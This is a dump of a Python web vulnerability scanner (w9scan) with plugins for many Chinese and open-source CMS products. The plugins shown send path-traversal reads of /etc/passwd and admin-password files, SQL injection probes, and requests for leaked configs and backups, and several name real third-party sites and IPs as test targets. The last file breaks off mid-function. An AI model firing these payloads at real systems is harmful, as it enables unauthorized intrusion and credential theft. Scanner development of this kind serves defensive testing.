├── lib
    ├── __init__.py
    ├── core
    │   ├── __init__.py
    │   ├── enums.py
    │   ├── data.py
    │   └── exception.py
    └── utils
    │   ├── __init__.py
    │   └── versioncheck.py
├── thirdparty
    ├── __init__.py
    ├── ansistrm
    │   └── __init__.py
    ├── colorama
    │   └── __init__.py
    └── termcolor
    │   └── __init__.py
├── plugins
    ├── d-link
    │   └── __init__.py
    ├── __init__.py
    ├── www
    │   ├── w9_gitleak.py
    │   ├── iis7.5parse.py
    │   ├── web_xml_leak.py
    │   ├── w9_svncheck.py
    │   ├── w9_crossdomain.py
    │   ├── 1233.py
    │   ├── 139.py
    │   ├── 683.py
    │   ├── 806.py
    │   ├── cst.py
    │   ├── 2426.py
    │   ├── 319.py
    │   └── 1076.py
    ├── dedecms
    │   ├── passwordrest.py
    │   ├── 431.py
    │   ├── 67.py
    │   ├── 108.py
    │   └── 107.py
    ├── jcms
    │   ├── 823.py
    │   └── 826.py
    ├── phpmyadmin
    │   └── 99.py
    ├── umail
    │   ├── 576.py
    │   └── 1634.py
    ├── espcms
    │   ├── 78.py
    │   └── 81.py
    ├── taodi
    │   └── 1072.py
    ├── wdcp
    │   └── 167.py
    ├── ewebs
    │   ├── 1770.py
    │   └── 1645.py
    ├── wecenter
    │   └── 420.py
    ├── appcms
    │   ├── 607.py
    │   └── 1784.py
    ├── phpshe
    │   ├── 848.py
    │   └── 1140.py
    ├── weaver_oa
    │   ├── 956.py
    │   └── 2498.py
    ├── php168
    │   ├── 138.py
    │   ├── 1252.py
    │   └── 1170.py
    ├── ynedut_campus
    │   └── 2622.py
    ├── jienuohan
    │   └── 2052.py
    ├── yongyou_fe
    │   ├── 238.py
    │   ├── 1910.py
    │   ├── 1909.py
    │   └── 1503.py
    ├── seentech_uccenter
    │   ├── 1848.py
    │   ├── 1846.py
    │   ├── 1526.py
    │   ├── 1827.py
    │   └── 1847.py
    ├── avcon6
    │   ├── 592.py
    │   ├── 593.py
    │   └── 594.py
    ├── shopex
    │   └── 103.py
    ├── wordpress
    │   ├── 2457.py
    │   ├── 205.py
    │   ├── 143.py
    │   ├── 142.py
    │   ├── 1179.py
    │   ├── 2272.py
    │   ├── 1119.py
    │   ├── 1639.py
    │   ├── 175.py
    │   ├── 241.py
    │   ├── 184.py
    │   ├── 439.py
    │   ├── 843.py
    │   ├── 284.py
    │   ├── 779.py
    │   ├── 1417.py
    │   ├── 144.py
    │   ├── 171.py
    │   ├── 182.py
    │   ├── 2408.py
    │   ├── 177.py
    │   ├── 391.py
    │   └── 443.py
    ├── ecscms
    │   ├── 1525.py
    │   └── 1363.py
    ├── rockoa
    │   └── 1950.py
    ├── vicworl
    │   └── 1149.py
    ├── cmstop
    │   └── 56.py
    ├── qizhitong_manager
    │   ├── 1545.py
    │   └── 1616.py
    ├── wizbank
    │   └── 1819.py
    ├── feifeicms
    │   └── 432.py
    ├── strongsoft
    │   └── 1875.py
    ├── thinkphp
    │   ├── 1832.py
    │   └── 1834.py
    ├── zhengfang
    │   └── 234.py
    ├── discuz
    │   ├── 141.py
    │   ├── 1204.py
    │   ├── 449.py
    │   ├── 1466.py
    │   ├── 450.py
    │   ├── 80.py
    │   ├── 47.py
    │   ├── 1507.py
    │   ├── 200.py
    │   ├── 298.py
    │   ├── 118.py
    │   └── 278.py
    ├── shopbuilder
    │   ├── 562.py
    │   ├── 502.py
    │   ├── 606.py
    │   └── 564.py
    ├── extmail
    │   ├── 1161.py
    │   └── 1162.py
    ├── eyou
    │   ├── 236.py
    │   ├── 1141.py
    │   ├── 559.py
    │   └── 2578.py
    ├── ns-asg
    │   ├── 346.py
    │   ├── 287.py
    │   └── 345.py
    ├── qibocms
    │   ├── 317.py
    │   ├── 1741.py
    │   ├── 1755.py
    │   ├── 356.py
    │   └── 321.py
    ├── ecshop
    │   ├── 293.py
    │   ├── 158.py
    │   └── 482.py
    ├── joomla
    │   ├── 1559.py
    │   ├── 147.py
    │   ├── 2730.py
    │   ├── 1422.py
    │   ├── 1671.py
    │   └── 1637.py
    ├── zblog
    │   └── 202.py
    ├── jeecms
    │   └── 1358.py
    ├── klemanndesign
    │   └── 1662.py
    ├── moxa_nport_router
    │   └── 2566.py
    ├── pageadmin
    │   └── 1442.py
    ├── empire_cms
    │   └── 2219.py
    ├── gnuboard
    │   └── 250.py
    ├── phpcms
    │   ├── 155.py
    │   ├── 120.py
    │   ├── 483.py
    │   ├── 491.py
    │   ├── 899.py
    │   └── 690.py
    ├── luepacific
    │   └── 2034.py
    ├── metinfo
    │   ├── 152.py
    │   └── 2824.py
    ├── 74cms
    │   ├── 600.py
    │   └── 1687.py
    ├── acsoft
    │   ├── 2346.py
    │   ├── 2590.py
    │   ├── 2588.py
    │   └── 2589.py
    ├── chengrui_edu
    │   └── 2656.py
    ├── libsys
    │   ├── 1778.py
    │   ├── 1530.py
    │   └── 1278.py
    ├── nitc
    │   ├── 2599.py
    │   └── 2598.py
    ├── yongyou_zhiyuan_a6
    │   ├── 2003.py
    │   ├── 1074.py
    │   └── 2675.py
    ├── phpweb
    │   ├── 166.py
    │   └── 1494.py
    ├── shop7z
    │   └── 2307.py
    ├── suyaxing2004
    │   ├── 1138.py
    │   └── 1132.py
    ├── able_g2s
    │   └── 1193.py
    ├── dkcms
    │   └── 105.py
    ├── douphp
    │   └── 434.py
    ├── fsmcms
    │   ├── 1104.py
    │   ├── 1463.py
    │   └── 1697.py
    ├── hf_firewall
    │   └── 1997.py
    ├── huaficms
    │   └── 2647.py
    ├── iceflow_vpn_router
    │   └── 1937.py
    ├── emlog
    │   └── 1257.py
    ├── hanweb
    │   ├── 861.py
    │   └── 2421.py
    ├── heeroa
    │   ├── 1286.py
    │   └── 347.py
    ├── ipowercms
    │   └── 1139.py
    ├── iwms
    │   └── 2648.py
    ├── thinkox
    │   └── 616.py
    ├── cmseasy
    │   ├── 220.py
    │   ├── 219.py
    │   ├── 827.py
    │   └── 839.py
    ├── esccms
    │   ├── 2555.py
    │   └── 2613.py
    ├── supesite
    │   └── 169.py
    ├── urp
    │   ├── 193.py
    │   └── 263.py
    ├── xycms
    │   └── 1981.py
    ├── fangwei
    │   ├── 484.py
    │   ├── 486.py
    │   └── 1805.py
    ├── feiyuxing_router
    │   └── 2025.py
    ├── kesioncms
    │   └── 1280.py
    ├── lianbangsoft
    │   ├── 2660.py
    │   ├── 2659.py
    │   ├── 2661.py
    │   ├── 1595.py
    │   ├── 1721.py
    │   └── 1740.py
    ├── tianrui_lib
    │   └── 2467.py
    ├── topsec_topaudit
    │   └── 1457.py
    ├── whezeip
    │   ├── 1356.py
    │   └── 1406.py
    ├── kinggate
    │   └── 2021.py
    ├── kingosoft_xsweb
    │   └── 1289.py
    ├── xtcms
    │   └── 2727.py
    ├── yongyou_crm
    │   └── 2595.py
    ├── zhongruan_firewall
    │   └── 1999.py
    ├── kingdee_eas
    │   └── 2581.py
    ├── pkpmbs
    │   └── 2550.py
    ├── sitefactory
    │   └── 1359.py
    ├── suntown_pm
    │   └── 2685.py
    ├── tianbo_train
    │   └── 2044.py
    ├── workyi_system
    │   └── 1582.py
    ├── dalianqianhao
    │   ├── 1258.py
    │   └── 1060.py
    ├── es-cloud
    │   └── 1279.py
    ├── phpb2b
    │   └── 2097.py
    ├── phpmps
    │   └── 481.py
    ├── trs_wcm
    │   └── 2231.py
    ├── zfsoft
    │   └── 2305.py
    ├── acsno
    │   └── 2212.py
    ├── wisedu_elcs
    │   └── 2188.py
    ├── zfcgxt
    │   └── 2643.py
    ├── zrar_zw
    │   └── 2766.py
    ├── haohan
    │   └── 2170.py
    ├── jenkins
    │   └── 804.py
    ├── tipask
    │   └── 1863.py
    ├── cicro
    │   └── 2718.py
    ├── efuture
    │   └── 2670.py
    ├── fangweituangou
    │   ├── 384.py
    │   └── 488.py
    ├── hsort
    │   └── 3251.py
    ├── shopnc
    │   └── 2446.py
    ├── shopxp
    │   └── 1438.py
    ├── yongyou_nc
    │   └── 2580.py
    ├── Tour
    │   └── 113.py
    ├── edutech
    │   └── 2751.py
    ├── insight
    │   └── 2502.py
    ├── mainone_b2b
    │   └── 2645.py
    ├── niubicms
    │   └── 478.py
    ├── skytech
    │   ├── 2708.py
    │   ├── 2709.py
    │   ├── 2713.py
    │   ├── 2711.py
    │   ├── 2716.py
    │   └── 2714.py
    ├── 686_weixin
    │   └── 1633.py
    ├── drupal
    │   └── 1185.py
    ├── easethink
    │   └── 1238.py
    ├── shadows-it
    │   └── 2462.py
    ├── tcexam
    │   └── 2717.py
    ├── gxwssb
    │   └── 2748.py
    ├── ip
    │   └── 749.py
    ├── landray
    │   └── 2744.py
    ├── ng-ags
    │   └── 1271.py
    ├── pstar
    │   ├── 2734.py
    │   └── 2735.py
    ├── xr_gatewayplatform
    │   └── 1393.py
    ├── lcecgap
    │   └── 2697.py
    ├── mbbcms
    │   └── 467.py
    ├── iwebshop
    │   └── 1354.py
    ├── jinqiangui_p2p
    │   └── 1798.py
    ├── netpower
    │   └── 1957.py
    ├── panabit
    │   └── 2108.py
    ├── piaoyou
    │   ├── 2482.py
    │   └── 2603.py
    ├── 7stars
    │   └── 2663.py
    ├── srun_gateway
    │   └── 1928.py
    ├── startbbs
    │   └── 333.py
    ├── 360shop
    │   └── 2732.py
    └── 5clib
    │   └── 2798.py
├── images
    └── report.png
├── output
    └── __init__.py
├── .gitignore
├── config.conf
└── dummy
    └── __init__.py


/lib/__init__.py:
--------------------------------------------------------------------------------
1 | 


--------------------------------------------------------------------------------
/lib/core/__init__.py:
--------------------------------------------------------------------------------
1 | 


--------------------------------------------------------------------------------
/lib/utils/__init__.py:
--------------------------------------------------------------------------------
1 | 


--------------------------------------------------------------------------------
/thirdparty/__init__.py:
--------------------------------------------------------------------------------
1 | 


--------------------------------------------------------------------------------
/plugins/d-link/__init__.py:
--------------------------------------------------------------------------------
1 | 


--------------------------------------------------------------------------------
/images/report.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/impakho/w9scan/master/images/report.png


--------------------------------------------------------------------------------
/output/__init__.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | # 这个目录输出结果以及日志文件


--------------------------------------------------------------------------------
/thirdparty/ansistrm/__init__.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | # author = i@cdxy.me
4 | # project = https://github.com/Xyntax/POC-T


--------------------------------------------------------------------------------
/thirdparty/colorama/__init__.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | # author = i@cdxy.me
4 | # project = https://github.com/Xyntax/POC-T


--------------------------------------------------------------------------------
/thirdparty/termcolor/__init__.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | # author = w8ay
4 | # project = https://github.com/boy-hack/w9scan


--------------------------------------------------------------------------------
/.gitignore:
--------------------------------------------------------------------------------
 1 | *.DS_Store
 2 | *.egg-info
 3 | *.log
 4 | *.lprof
 5 | *.py[cod]
 6 | *.swp
 7 | *.idea
 8 | .coverage
 9 | .svn
10 | .tox
11 | .idea
12 | output
13 | data
14 | test.py
15 | 


--------------------------------------------------------------------------------
/plugins/__init__.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | # -*- coding:utf-8 -*-
 3 | # Author: VER007
 4 | # Time: 17/4/1 上午12:42
 5 | # Description: __init__.py python2.7
 6 | # License: Apache Licence 
 7 | 
 8 | 
 9 | 
10 | 
11 | 
12 | 
13 | 
14 | 


--------------------------------------------------------------------------------
/plugins/www/w9_gitleak.py:
--------------------------------------------------------------------------------
 1 | 
 2 | 
 3 | def assign(service, arg):
 4 |     if service == "www":
 5 |         return True,arg
 6 | 
 7 | def audit(arg):
 8 |     target_url = '/.git/config'
 9 | 
10 |     code, head, body, redirect, log = hackhttp.http(arg + target_url)
11 | 
12 |     if '[remote "origin"]' in body:
13 |         security_hole(" git leak:" + arg + target_url)
14 | 


--------------------------------------------------------------------------------
/config.conf:
--------------------------------------------------------------------------------
 1 | # 这些选项用于配置w9scan扫描器扫描时的各种参数
 2 | 
 3 | 
 4 | [Config]
 5 | 
 6 | # 扫描线程
 7 | thread = 10
 8 | 
 9 | # 爬虫深度
10 | crawlerDeep = 10
11 | 
12 | # 超时时间(秒)
13 | TimeOut = 10
14 | 
15 | # User-agent
16 | UserAgent = Mozilla/5.0 w9scan by w8ay
17 | 
18 | # Cookie
19 | Cookie = 
20 | 
21 | # Extra HTTP headers
22 | # eg:
23 | # header = 'Referer:https://bugscan.net\r\nUser-Agent: hackhttp user-agent'
24 | headers = 


--------------------------------------------------------------------------------
/lib/core/enums.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | # -*- coding: utf-8 -*-
 3 | 
 4 | class CUSTOM_LOGGING:
 5 |     SYSINFO = 9
 6 |     SUCCESS = 8
 7 |     ERROR = 7
 8 |     WARNING = 6
 9 |     DEBUG = 5
10 | 
11 | class EXIT_STATUS:
12 |     SYSETM_EXIT = 0
13 |     ERROR_EXIT = 1
14 |     USER_QUIT = 2
15 | 
16 | class OPTION_TYPE:
17 |     BOOLEAN = "boolean"
18 |     INTEGER = "integer"
19 |     FLOAT = "float"
20 |     STRING = "string"


--------------------------------------------------------------------------------
/plugins/dedecms/passwordrest.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | # -*- coding: utf-8 -*-
 3 | #ref:https://www.t00ls.net/thread-43689-1-1.html
 4 | 
 5 | def assign(service, arg):
 6 |     if service == "dedecms":
 7 |         return True, arg
 8 | 
 9 | def audit(arg):
10 |     url = arg
11 |     code, head, body, redirect, log = hackhttp.http(arg + 'member/reg_new.php')
12 |     if "系统关闭了会员功能" in body:
13 |         return
14 |     security_note("可能存在dede任意用户重置漏洞:https://www.t00ls.net/thread-43689-1-1.html")


--------------------------------------------------------------------------------
/lib/utils/versioncheck.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | 
 3 | """
 4 | Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
 5 | See the file 'doc/COPYING' for copying permission
 6 | """
 7 | 
 8 | import sys
 9 | 
10 | PYVERSION = sys.version.split()[0]
11 | 
12 | if PYVERSION >= "3" or PYVERSION < "2.6":
13 |     exit("[CRITICAL] incompatible Python version detected ('%s'). For successfully running sqlmap you'll have to use version 2.6.x or 2.7.x (visit 'http://www.python.org/download/')" % PYVERSION)


--------------------------------------------------------------------------------
/plugins/jcms/823.py:
--------------------------------------------------------------------------------
 1 | import re
 2 | def assign(service,arg):
 3 |     if service == "jcms":
 4 |         return True,arg
 5 | def audit(arg):
 6 |     payload = "vc/vc/columncount/tem/downfile.jsp?filename=/etc/passwd&savename=down.txt"
 7 |     url = arg + payload
 8 |     code ,head,res,body,_ = curl.curl(url)
 9 |     if code == 200 and 'root:' in res:
10 |         security_warning(url)
11 |         
12 | if __name__ == '__main__':
13 |     from dummy import *
14 |     audit(assign('jcms','http://jcms.cscec.com/')[1])


--------------------------------------------------------------------------------
/plugins/phpmyadmin/99.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | 
 3 | def assign(service, arg):
 4 |     if service == 'phpmyadmin':
 5 |         return True, arg
 6 | 
 7 | def audit(arg):
 8 |     code, head, res, errcode, _ = curl.curl(arg + 'main.php')
 9 |     if code == 200 and res and res.find('MySQL client version') != -1 and res.find('root@localhost') != -1:
10 |         security_hole(arg)
11 | 
12 | 
13 | if __name__ == '__main__':
14 |     from dummy import *
15 |     audit(assign('phpmyadmin', 'http://union.fxaa.cc/old/')[1])
16 | 
17 | 


--------------------------------------------------------------------------------
/plugins/umail/576.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | 
 3 | def assign(service, arg):
 4 |     if service == "umail":
 5 |         return True, arg
 6 | 
 7 | def audit(arg):
 8 |     payload = "webmail/getpass2.php?email=1@qq .com&update=2"
 9 |     url = arg + payload
10 |     code, head, res, errcode, _ = curl.curl(url)
11 |     if code == 200 and "Your password is" in res:
12 |         security_info(url)
13 | 
14 | if __name__ == '__main__':
15 |     from dummy import *
16 |     audit(assign('umail', 'http://mail.wanduyiliao.com.cn/')[1])


--------------------------------------------------------------------------------
/plugins/espcms/78.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | # http://www.cnseay.com/archives/2383
 3 | 
 4 | def assign(service, arg):
 5 |     if service == "espcms":
 6 |         return True, arg
 7 | 
 8 | def audit(arg):
 9 |     url = arg
10 |     code, _, res, _, _ = curl.curl(url + 'index.php?ac=search&at=taglist&tagkey=a%2527')
11 |     if code == 200 and res.find('ESPCMS SQL Error:') != -1:
12 |         security_hole(url)
13 | 
14 | if __name__ == '__main__':
15 |     from dummy import *
16 |     audit(assign('espcms', 'http://www.fr8.cn/')[1])
17 | 


--------------------------------------------------------------------------------
/plugins/dedecms/431.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | import re
 3 | 
 4 | def assign(service, arg):
 5 |     if service == "dedecms":
 6 |         return True, arg
 7 | 
 8 | def audit(arg):
 9 |     url = arg
10 |     code, head, res, errcode, _ = curl.curl(url + 'data/mysqli_error_trace.inc')
11 |     if code == 200 and 'exit();' in res:
12 |         security_warning('dedecms error info:' + url + 'data/mysqli_error_trace.inc')
13 | if __name__ == '__main__':
14 |     from dummy import *
15 |     audit(assign('dedecms', 'http://localhost:66/dede')[1])


--------------------------------------------------------------------------------
/plugins/espcms/81.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | # http://www.cnseay.com/archives/2383
 3 | 
 4 | def assign(service, arg):
 5 |     if service == "espcms":
 6 |         return True, arg
 7 | 
 8 | def audit(arg):
 9 |     url = arg
10 |     code, _, res, _, _ = curl.curl(url + 'index.php?ac=search&at=list&att[seay]=testvul')
11 |     if code == 200 and res.find('ESPCMS SQL Error:') != -1:
12 |         security_hole(url)
13 | 
14 | if __name__ == '__main__':
15 |     from dummy import *
16 |     audit(assign('espcms', 'http://www.fr8.cn/')[1])
17 | 


--------------------------------------------------------------------------------
/plugins/taodi/1072.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | import re
 3 | 
 4 | def assign(service, arg):
 5 |     if service == "taodi":
 6 |         return True, arg
 7 | 
 8 | def audit(arg):
 9 |     url = arg
10 |     code, head, res, errcode, _ = curl.curl2(url + 'taodi/pic.php?url=cGljLnBocA==')
11 |     if code == 200:
12 |         m = re.search('file_get_contents', res)
13 |         if m:
14 |             security_info(m.group(0))
15 | 
16 | if __name__ == '__main__':
17 |     from dummy import *
18 |     audit(assign('taodi','http://127.0.0.1/')[1])
19 | 


--------------------------------------------------------------------------------
/plugins/www/iis7.5parse.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | import re
 3 | import urlparse
 4 | 
 5 | 
 6 | def assign(service, arg):
 7 |     if service == "www":
 8 |         return True, arg
 9 | 
10 | 
11 | def audit(arg):
12 |     path = "/robots.txt/.php"
13 |     code, head, res, errcode, _ = curl.curl(arg + path)
14 |     if code == 200 and "User-agent" in res:
15 |         security_note("存在解析漏洞:" + arg + path)
16 | 
17 | 
18 | if __name__ == '__main__':
19 |     from dummy import *
20 | 
21 |     audit(assign('www', 'http://blog.hacking8.com/')[1])
22 | 


--------------------------------------------------------------------------------
/plugins/dedecms/67.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | # -*- coding: utf-8 -*-
 3 | # DedeCms data/mysql_error_trace.inc 敏感信息泄露
 4 | 
 5 | def assign(service, arg):
 6 |     if service == "dedecms":
 7 |         return True, arg
 8 | 
 9 | def audit(arg):
10 |     url = arg + 'data/mysql_error_trace.inc'
11 |     _, _, body, _, _ = curl.curl(url)
12 |     if body and body.find('<?php  exit();') != -1:
13 |         security_note(url)
14 | 
15 | if __name__ == '__main__':
16 |     from dummy import *
17 |     audit(assign('dedecms', 'http://www.9ifd.com/')[1])
18 | 


--------------------------------------------------------------------------------
/plugins/jcms/826.py:
--------------------------------------------------------------------------------
 1 | import re
 2 | def assign(service,arg):
 3 |     if service == "jcms":
 4 |         return True,arg
 5 | def audit(arg):
 6 |     payload = "jcms/jcms_files/jcms1/web1/site/module/comment/opr_readfile.jsp?filename=../../../../../../WEB-INF/ini/merpserver.ini"
 7 |     url = arg + payload
 8 |     code ,head,res,body,_ = curl.curl(url)
 9 |     if code == 200 and 'AdminPW' in res:
10 |         security_warning(url)
11 |         
12 | if __name__ == '__main__':
13 |     from dummy import *
14 |     audit(assign('jcms','http://anxiang.gov.cn/')[1])


--------------------------------------------------------------------------------
/plugins/wdcp/167.py:
--------------------------------------------------------------------------------
 1 | #Referer:	http://www.securityfocus.com/archive/1/534437
 2 | def assign(service, arg):
 3 |     if service == "wdcp":
 4 |         return True, arg
 5 | 
 6 | def audit(args):
 7 |     payload = 'mysql/add_user.php'
 8 |     verify_url = args + payload
 9 |     code, head, content, errcode,finalurl = curl.curl(verify_url)
10 |     if code==200 and 'localhost' in content:
11 |         security_hole(verify_url)
12 | 
13 | if __name__ == '__main__':
14 |     from dummy import *
15 |     audit(assign('wdcp', 'http://wxw80.tem.com.cn:5368/')[1])
16 | 


--------------------------------------------------------------------------------
/lib/core/data.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | 
 3 | """
 4 | Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
 5 | See the file 'doc/COPYING' for copying permission
 6 | """
 7 | 
 8 | from lib.core.datatype import AttribDict
 9 | from lib.core.log import MY_LOGGER
10 | 
11 | logger = MY_LOGGER
12 | 
13 | # w9scan paths
14 | paths = AttribDict()
15 | 
16 | # w9scan cmder
17 | cmdLineOptions = AttribDict()
18 | 
19 | # w9scan urlconfig
20 | urlconfig = AttribDict()
21 | w9config = AttribDict()
22 | 
23 | # w9scan plugins pycode hash
24 | w9_hash_pycode = dict()


--------------------------------------------------------------------------------
/plugins/ewebs/1770.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | # -*- coding: utf-8 -*-
 3 | #refer: http://www.wooyun.org/bugs/wooyun-2010-0121875
 4 | 
 5 | def assign(service, arg):
 6 |     if service == "ewebs":
 7 |         return True, arg
 8 | 
 9 | def audit(arg):
10 |     vul_url = arg + 'testweb.php'
11 |     code, _, body, _, _ = curl.curl2(vul_url)
12 |     if code == 200 and '<td>access.log</td>' in body:
13 |         security_warning(vul_url)
14 | 
15 | if __name__ == '__main__':
16 |     from dummy import *
17 |     audit(assign('ewebs', 'http://60.190.163.51:8888/')[1])


--------------------------------------------------------------------------------
/plugins/wecenter/420.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | import re
 3 | 
 4 | def assign(service, arg):
 5 |     if service == "wecenter":
 6 |         return True, arg
 7 | 
 8 | def audit(arg):
 9 |     url = arg
10 |     code, head, res, errcode, _ = curl.curl(url + '?/search/ajax/search_result/')
11 |     if code == 200:
12 |         m = re.search('in(.+) on line', res)
13 |         if m:
14 |             security_info(m.group(1))
15 | 
16 | if __name__ == '__main__':
17 |     from dummy import *
18 |     audit(assign('wecenter', 'http://localhost:8080/wecenter/')[1])
19 | 


--------------------------------------------------------------------------------
/plugins/www/web_xml_leak.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | import re
 3 | import urlparse
 4 | 
 5 | 
 6 | def assign(service, arg):
 7 |     if service == "www":
 8 |         return True, arg
 9 | 
10 | 
11 | def audit(arg):
12 |     path = "/WEB-INF/web.xml"
13 |     code, head, res, errcode, _ = curl.curl(arg + path)
14 |     if code == 200 and "<web-app" in res:
15 |         security_note("存在TOMCAT web.xml泄露:" + arg + path)
16 | 
17 | 
18 | if __name__ == '__main__':
19 |     from dummy import *
20 | 
21 |     audit(assign('www', 'http://blog.hacking8.com/')[1])
22 | 


--------------------------------------------------------------------------------
/plugins/www/w9_svncheck.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | # -*- coding: utf-8 -*-
 3 | '''
 4 | name: svn源码泄露扫描
 5 | referer: unknown
 6 | author: Lucifer
 7 | description: 忘记了删除.svn目录而导致的漏洞。
 8 | '''
 9 | def assign(service, arg):
10 |     if service == "www":
11 |         return True, arg
12 | 
13 | def audit(arg):
14 |     payload = "/.svn/entries"
15 |     vulnurl = arg + payload
16 |     code, head, html, redirect_url, log = hackhttp.http(vulnurl)
17 |     
18 |     if r"dir" in html or r"file" in html and code==200:
19 |         security_hole(u"svn源码泄露 payload:"+vulnurl)


--------------------------------------------------------------------------------
/plugins/appcms/607.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | # -*- coding: utf-8 -*-
 3 | #!/usr/bin/env python
 4 | 
 5 | def assign(service, arg):
 6 |     if service == "appcms":
 7 |         return True, arg
 8 | 
 9 | def audit(arg):
10 |     payload = 'backup/appcms.sql'
11 |     url = arg + payload
12 |     code, head, res, errcode, _ = curl.curl(url)
13 |     if code == 200:
14 |         if ('SELECT' in res) or ('FORM' in res): 
15 |             security_hole(url)
16 | 
17 | if __name__ == '__main__':
18 |     from dummy import *
19 |     audit(assign('appcms', 'http://localhost/')[1])


--------------------------------------------------------------------------------
/plugins/phpshe/848.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | #-*- coding: utf-8 -*-
 3 | import re
 4 | def assign(service, arg):
 5 |     if service == "phpshe":
 6 |         return True, arg
 7 | 
 8 | 
 9 | def audit(arg):
10 |     url = arg
11 |     code, head, res, errcode, _ = curl.curl(url + '/module/index/index.php')
12 |     if code == 200:
13 |         m = re.search('in <b>([^<]+)</b>', res)
14 |         if m:
15 |             security_info(m.group(1))
16 | 
17 | 
18 | if __name__ == '__main__':
19 |     from dummy import *
20 |     audit(assign('phpshe', 'http://www.jtdsc.com')[1])


--------------------------------------------------------------------------------
/plugins/weaver_oa/956.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/python
 2 | # -*- coding: utf-8 -*-
 3 | #__author__ = '1c3z'
 4 | #ref http://www.wooyun.org/bugs/wooyun-2010-087500
 5 | 
 6 | def assign(service, arg):
 7 |     if service == "weaver_oa":
 8 |         return True, arg
 9 | 
10 | def audit(url):
11 |     url += 'mysql_config.ini'
12 |     code, head,res, errcode, _ = curl.curl2(url)
13 |     if 'datapassword' in res:
14 |         security_warning(url)
15 | 
16 | 
17 | if __name__ == '__main__':
18 |     from dummy import *
19 |     audit(assign('weaver_oa', 'http://219.232.254.131:8082/')[1])


--------------------------------------------------------------------------------
/plugins/php168/138.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | # -*- coding: utf-8 -*-
 3 | #__author__ = 'boy'
 4 | 
 5 | 
 6 | def assign(service, arg):
 7 |     if service == "php168":
 8 |         return True, arg
 9 | 
10 | def audit(arg):
11 |     code, head, res, errcode,finalurl = curl.curl('%snews/js.php?type=hot&f_id=23)' % arg)
12 |     m = res.find("SELECT")
13 |     if m!=-1:
14 |         security_info('find sql injection:%snews/js.php?type=hot&f_id=23)'% arg)
15 | if __name__ == '__main__':
16 |     from dummy import *
17 |     audit(assign('php168', 'http://www.ly910.com/')[1])
18 | 


--------------------------------------------------------------------------------
/plugins/ynedut_campus/2622.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/evn python 
 2 | #--coding:utf-8--*--
 3 | #Name:YNedut Campus数字校园平台任意命令执行
 4 | #Refer:http://www.wooyun.org/bugs/wooyun-2014-050804
 5 | #Author:xq17
 6 | 
 7 |  
 8 | def assign(service, arg):
 9 |     if service == 'ynedut_campus':
10 |     	return True,arg
11 | def audit(arg):
12 |     param_data = 'login/login!forwardFrameIndex.action'
13 |     url = arg + param_data
14 |     task_push('struts' ,url)
15 |    
16 | if __name__ == '__main__':
17 |     from dummy import *
18 |     audit(assign('ynedut_campus','http://117.141.5.246:8800/oa/')[1])


--------------------------------------------------------------------------------
/lib/core/exception.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | # -*- coding: utf-8 -*-
 3 | 
 4 | class ToolkitBaseException(Exception):
 5 |     pass
 6 | 
 7 | class ToolkitDataException(ToolkitBaseException):
 8 |     pass
 9 | 
10 | class ToolkitMissingPrivileges(ToolkitBaseException):
11 |     pass
12 | 
13 | class ToolkitUserQuitException(ToolkitBaseException):
14 |     pass
15 | 
16 | class ToolkitSystemException(ToolkitBaseException):
17 |     pass
18 | 
19 | class ToolkitValueException(ToolkitBaseException):
20 |     pass
21 | 
22 | class ToolkitPluginException(ToolkitBaseException):
23 |     pass


--------------------------------------------------------------------------------
/plugins/www/w9_crossdomain.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | # -*- coding: utf-8 -*-
 3 | '''
 4 | name: crossdomain.xml文件发现
 5 | referer: unknown
 6 | author: Lucifer
 7 | description: crossdomain错误配置可导致。
 8 | '''
 9 | def assign(service, arg):
10 |     if service == "www":
11 |         return True, arg
12 | 
13 | def audit(arg):
14 |     payload = "/crossdomain.xml"
15 |     vulnurl = arg + payload
16 |     code, head, html, redirect_url, log = hackhttp.http(vulnurl)
17 |     if 'allow-access-from domain="*"' in html:
18 |         security_note(u"存在crossdomain.xml文件发现漏洞...(信息) payload: "+vulnurl)


--------------------------------------------------------------------------------
/plugins/jienuohan/2052.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | # -*- coding: utf-8 -*-
 3 | import time
 4 | def assign(service, arg):
 5 |     if service == "jienuohan":
 6 |         return True, arg
 7 | 
 8 | def audit(arg):
 9 |     url = arg + 'Login.aspx'
10 |     data = "username=' %2B (select convert(int,'test'%2B'vul') FROM syscolumns) %2B '"
